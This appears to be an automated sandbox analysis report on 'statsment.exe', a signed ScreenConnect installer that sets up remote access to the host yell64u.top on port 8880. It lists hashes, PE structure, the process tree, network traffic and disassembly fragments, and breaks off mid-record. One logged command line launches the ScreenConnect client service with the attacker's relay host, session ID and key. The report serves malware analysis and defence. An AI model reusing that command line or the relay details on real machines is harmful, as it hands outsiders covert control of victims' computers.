                                                                    SHA1:937D62E399A004EE4399FAD792BC1BE6863AE87E
                                                                    SHA-256:CCFABDA3A7755623AD056B8673710DA4882470EFA6A5EA8B5847B42425C52B88
                                                                    SHA-512:A8CC4309DD4D9147AA15F4FF25B21680EDB21094CF4DEAB35704E7C87EFAF20E8ACA043AB65E84646E03047635ADDD6FAFC43991AAD09968C13037E9C5A8F48B
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):0.0689519108823031
                                                                    Encrypted:false
                                                                    SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO9Oh+TR0yVky6l3X:2F0i8n0itFzDHF8+lm3X
                                                                    MD5:E5BA7F7179A11BAB0C962E9FCBAB5A1F
                                                                    SHA1:D43F42006301207736B2428D5B541FC6C5E0D9B1
                                                                    SHA-256:6F3ADCDC23CB8E53DDBBAF1A17E143074896D3A6CE89A837DB459AFF77DBAED7
                                                                    SHA-512:03660368587B7AE051835535C2188939C1866707F786B63EEE0BDBE13A8DE71F203B687D9A50CA8E92EFDB16B0873F859D39C714BB1482D8B7747613C7635499
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.7964183569782501
                                                                    Encrypted:false
                                                                    SSDEEP:48:I8PhDuRc06WX4unT5v9ptcqcq56AduNSiA9EdZq+ommXrz4ao8rmAduNSID:XhD1enTHppYfaEdwLmm34D
                                                                    MD5:5B8A65C0D429AA7ED5920066362E617B
                                                                    SHA1:6BABEEBFFA878BDBE934FB6214FA1B9E28845A1A
                                                                    SHA-256:C4F8E8799093B8B1FE276C988161422295B1E7E76CA49B6B05C10D49E7EBB0D9
                                                                    SHA-512:2FF13882D99608AD5B3CC97255F87377A80B4C030D7A8EB80A5219A51D4FE619B01E671529B717313F07324D89C43C4A1699DF1E1098507832EB5C7ABF3E1CF2
                                                                    Malicious:false
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.4294828876487875
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:statsment.exe
                                                                    File size:5'652'448 bytes
                                                                    MD5:321132051c3add66f0cdae4b8cf4c332
                                                                    SHA1:8513ae78b78f157fdd8800f2eda654c75332cd4b
                                                                    SHA256:d19dbc6b0c0792df8f420c14ef25130052a81d481d38340a40194862ff0095cd
                                                                    SHA512:5c47b794ea1f3e277883159d652b77e8da2dccdbb890ede18d3eb7b3db960d0848f770ea13dcbbe26bc4a61baf6559921dec3531d23d390e19982d5726541fcc
                                                                    SSDEEP:49152:IDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfoc:c4s6efPQ53JLbd3LINMLaGUW39f0
                                                                    TLSH:D046E111B3D995B9C0BF063CD87A52699A74BC048722C7AF57D4BD292D32BC05E323B6
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x4014ad
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                    Signature Valid:true
                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                    Signature Validation Error:The operation completed successfully
                                                                    Error Number:0
                                                                    Not Before, Not After
                                                                    • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                    Subject Chain
                                                                    • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                    Version:3
                                                                    Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                    Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                    Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                    Serial:0B9360051BCCF66642998998D5BA97CE
                                                                    Instruction
                                                                    call 00007F13C47003AAh
                                                                    jmp 00007F13C46FFE5Fh
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push 00000000h
                                                                    call dword ptr [0040D040h]
                                                                    push dword ptr [ebp+08h]
                                                                    call dword ptr [0040D03Ch]
                                                                    push C0000409h
                                                                    call dword ptr [0040D044h]
                                                                    push eax
                                                                    call dword ptr [0040D048h]
                                                                    pop ebp
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 00000324h
                                                                    push 00000017h
                                                                    call dword ptr [0040D04Ch]
                                                                    test eax, eax
                                                                    je 00007F13C46FFFE7h
                                                                    push 00000002h
                                                                    pop ecx
                                                                    int 29h
                                                                    mov dword ptr [004148D8h], eax
                                                                    mov dword ptr [004148D4h], ecx
                                                                    mov dword ptr [004148D0h], edx
                                                                    mov dword ptr [004148CCh], ebx
                                                                    mov dword ptr [004148C8h], esi
                                                                    mov dword ptr [004148C4h], edi
                                                                    mov word ptr [004148F0h], ss
                                                                    mov word ptr [004148E4h], cs
                                                                    mov word ptr [004148C0h], ds
                                                                    mov word ptr [004148BCh], es
                                                                    mov word ptr [004148B8h], fs
                                                                    mov word ptr [004148B4h], gs
                                                                    pushfd
                                                                    pop dword ptr [004148E8h]
                                                                    mov eax, dword ptr [ebp+00h]
                                                                    mov dword ptr [004148DCh], eax
                                                                    mov eax, dword ptr [ebp+04h]
                                                                    mov dword ptr [004148E0h], eax
                                                                    lea eax, dword ptr [ebp+08h]
                                                                    mov dword ptr [004148ECh], eax
                                                                    mov eax, dword ptr [ebp-00000324h]
                                                                    mov dword ptr [00414828h], 00010001h
                                                                    Programming Language:
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 build 21022
                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x129c4 | 0x50 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x533080 | .rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x546200 | 0x1dde0 |
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x54a000 | 0xea8 | .reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11f20 | 0x70 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x11e60 | 0x40 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x13c | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                    .text | 0x1000 | 0xb1af | 0xb200 | d9fa6da0baf4b869720be833223490cb | False | 0.6123156601123596 | data | 6.592039633797327 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata | 0xd000 | 0x6078 | 0x6200 | 8b45a1035c0de72f910a75db7749f735 | False | 0.41549744897959184 | data | 4.786621464556291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data | 0x14000 | 0x11e4 | 0x800 | 1f4cc86b6735a74429c9d1feb93e2871 | False | 0.18310546875 | data | 2.265083745848167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc | 0x16000 | 0x533080 | 0x533200 | 0cb59c276652808eb7200fdad38bae5b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc | 0x54a000 | 0xea8 | 0x1000 | a93b0f39998e1e69e5944da8c5ff06b1 | False | 0.72265625 | data | 6.301490309336801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                    FILES | 0x163d8 | 0x86000 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.39622565881529853
                                                                    FILES | 0x9c3d8 | 0x1a4600 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.5111637115478516
                                                                    FILES | 0x2409d8 | 0x1ac00 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.4415614047897196
                                                                    FILES | 0x25b5d8 | 0x2ec320 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.9812068939208984
                                                                    FILES | 0x5478f8 | 0x1600 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3908025568181818
                                                                    RT_MANIFEST | 0x548ef8 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
                                                                    DLL | Import
                                                                    mscoree.dll | CorBindToRuntimeEx
                                                                    KERNEL32.dll | GetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                    OLEAUT32.dll | VariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                    Language of compilation system | Country where language is spoken | Map
                                                                    English | United States |
                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Dec 13, 2024 03:13:11.123925924 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:11.123976946 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:11.123994112 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:12.003371000 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:12.170116901 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:14:12.008240938 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:14:12.128350973 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:15:12.132924080 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:15:12.253220081 CET88804973185.239.34.190192.168.2.4
                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Dec 13, 2024 03:13:07.162753105 CET | 59204 | 53 | 192.168.2.4 | 1.1.1.1
                                                                    Dec 13, 2024 03:13:07.704803944 CET | 53 | 59204 | 1.1.1.1 | 192.168.2.4
                                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                    Dec 13, 2024 03:13:07.162753105 CET | 192.168.2.4 | 1.1.1.1 | 0xd719 | Standard query (0) | yell64u.top | A (IP address) | IN (0x0001) | false
                                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                    Dec 13, 2024 03:13:07.704803944 CET | 1.1.1.1 | 192.168.2.4 | 0xd719 | No error (0) | yell64u.top | | 85.239.34.190 | A (IP address) | IN (0x0001) | false

                                                                    Target ID:0
                                                                    Start time:21:12:59
                                                                    Start date:12/12/2024
                                                                    Path:C:\Users\user\Desktop\statsment.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\statsment.exe"
                                                                    Imagebase:0x240000
                                                                    File size:5'652'448 bytes
                                                                    MD5 hash:321132051C3ADD66F0CDAE4B8CF4C332
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1716747544.0000000005430000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1698483119.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:21:13:00
                                                                    Start date:12/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                                                                    Imagebase:0x7b0000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:21:13:01
                                                                    Start date:12/12/2024
                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                    Imagebase:0x7ff79d740000
                                                                    File size:69'632 bytes
                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:3
                                                                    Start time:21:13:01
                                                                    Start date:12/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 8184DE85A5CB7E60E4BEE8460840EE70 C
                                                                    Imagebase:0x7b0000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:21:13:01
                                                                    Start date:12/12/2024
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICAFF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5884812 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                    Imagebase:0xc90000
                                                                    File size:61'440 bytes
                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:21:13:03
                                                                    Start date:12/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding DF919848E655E7C7ACF0240BA4C9A705
                                                                    Imagebase:0x7b0000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:21:13:04
                                                                    Start date:12/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6E13845DE42F2DC1013E1DB414C7336A E Global\MSI0000
                                                                    Imagebase:0x7b0000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:21:13:04
                                                                    Start date:12/12/2024
                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Groups&c=&c=&c=&c=&c=&c=&c="
                                                                    Imagebase:0x410000
                                                                    File size:95'520 bytes
                                                                    MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    • Detection: 3%, Virustotal, Browse
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:21:13:06
                                                                    Start date:12/12/2024
                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "0cb4bca7-7067-4861-8f9f-7ae40c9c0413" "User"
                                                                    Imagebase:0xad0000
                                                                    File size:601'376 bytes
                                                                    MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.2960693212.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:9
                                                                    Start time:21:13:09
                                                                    Start date:12/12/2024
                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "b789ee53-da8d-4b10-9490-36f6b234bd89" "System"
                                                                    Imagebase:0x6e0000
                                                                    File size:601'376 bytes
                                                                    MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Has exited:true

                                                                      • Instruction ID: f2170ede94b51ebf3288e1f20a26f0505c063aa745c73fd27f6a181965673d2e
                                                                      • Opcode Fuzzy Hash: bd67cbb86d09c80f10f679f076c7a670cd2eaf7af56e02574d82b575343afba5
                                                                      • Instruction Fuzzy Hash: 0851E174B042498FCB44EFAEC4986AEBBE2FF94350B14846AE945CB385DF34DC0187A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: b5ec84a208d11a62416abfa39846667d2ecede1b95c41db3fe8642b482c49b53
                                                                      • Instruction ID: 164355b99e451afbf440ad2c99bda27eab5fc4827bb5c4ad9bf3ae66c3b96392
                                                                      • Opcode Fuzzy Hash: b5ec84a208d11a62416abfa39846667d2ecede1b95c41db3fe8642b482c49b53
                                                                      • Instruction Fuzzy Hash: 50818F70B002159FC704DF69C994AAEBBF6FF88710F158169E945EB3A5CB30AC05CBA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 94e70fa9743ef4a6c0b6151809cf8324a4e03515ef126c5abe5c6e0489f600d8
                                                                      • Instruction ID: b9647af8c6506f1e23ad30ad7f575732aee695fdb98dea0f7d3bc71c82013fc7
                                                                      • Opcode Fuzzy Hash: 94e70fa9743ef4a6c0b6151809cf8324a4e03515ef126c5abe5c6e0489f600d8
                                                                      • Instruction Fuzzy Hash: 7B715D74B002159FDB14DF69C984AAEB7F6FF88710F558169E945EB3A5CB30AC01CB50
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1697825878.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10e0000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (bq
                                                                      • API String ID: 0-149360118
                                                                      • Opcode ID: 17ba806d27d8c07cf1fd314c6aa376c56d053c1f92fe512e5adc23abf5329fde
                                                                      • Instruction ID: 037c0a1208bbea5c73ce08b1cf68e813c168004271b61965ffcda11e5222b963
                                                                      • Opcode Fuzzy Hash: 17ba806d27d8c07cf1fd314c6aa376c56d053c1f92fe512e5adc23abf5329fde
                                                                      • Instruction Fuzzy Hash: EB612538B106159FDB14CF69D8989AEB7F2FF8D304B1481A9E546AB365DB30EC01CB80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: ef3217c3a6f3dc7398553f234aed3f917648ba5abf8e90ced620e43c7a8ecd56
                                                                      • Instruction ID: ff6a938ac6335fe79278f45ebb6eef56dcd9b38caf4f9f9f79cb543292081f20
                                                                      • Opcode Fuzzy Hash: ef3217c3a6f3dc7398553f234aed3f917648ba5abf8e90ced620e43c7a8ecd56
                                                                      • Instruction Fuzzy Hash: 3151F030B002219FCB249F64D8587AFBBF2BF84704F14896AE44ADB395DB399C41CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: kim^
                                                                      • API String ID: 0-4159165388
                                                                      • Opcode ID: 50e674ea59b8f6ae823e1693e81a9937a0e2c9b586f9050811769be4a6b9c0a6
                                                                      • Instruction ID: 900375b524aa6fa1a285e4ea51852938358f1ecec040008788fd1908baa94000
                                                                      • Opcode Fuzzy Hash: 50e674ea59b8f6ae823e1693e81a9937a0e2c9b586f9050811769be4a6b9c0a6
                                                                      • Instruction Fuzzy Hash: E6513038B003158FCB14DFA9C9949AAB7F6FF8C300B64856AE505DB365EB74EC458B90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: kim^
                                                                      • API String ID: 0-4159165388
                                                                      • Opcode ID: 34e2879ed527370ddcbf1bbacd2deaa19ca574509d5b2dd5dd340676fd0b2052
                                                                      • Instruction ID: 7b64cf81a2568061839cc2b1882f5f7544ab2976b82d101a3ff3d0c1c703db65
                                                                      • Opcode Fuzzy Hash: 34e2879ed527370ddcbf1bbacd2deaa19ca574509d5b2dd5dd340676fd0b2052
                                                                      • Instruction Fuzzy Hash: E2513F38B003158FCB14DF69C9949AABBF6FF8C300B64856AE505DB365EB74EC458B90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1697825878.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10e0000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: K]
                                                                      • API String ID: 0-3798347547
                                                                      • Opcode ID: 984b45642857a6da32441eeea327a2fc9f587ff993022a19ac30dc24e58e1e19
                                                                      • Instruction ID: 089d010148a183bc9a1c4cd421f5349264ab8ad4784d33dcfbef46272bee75cd
                                                                      • Opcode Fuzzy Hash: 984b45642857a6da32441eeea327a2fc9f587ff993022a19ac30dc24e58e1e19
                                                                      • Instruction Fuzzy Hash: C5412276A442118FCB419F6ED8D539AFBE4EF81260B14C5B7E888CF356EA30C80587A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1716651722.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5420000_statsment.jbxd
                                                                      Similarity
                                                                      • API ID:
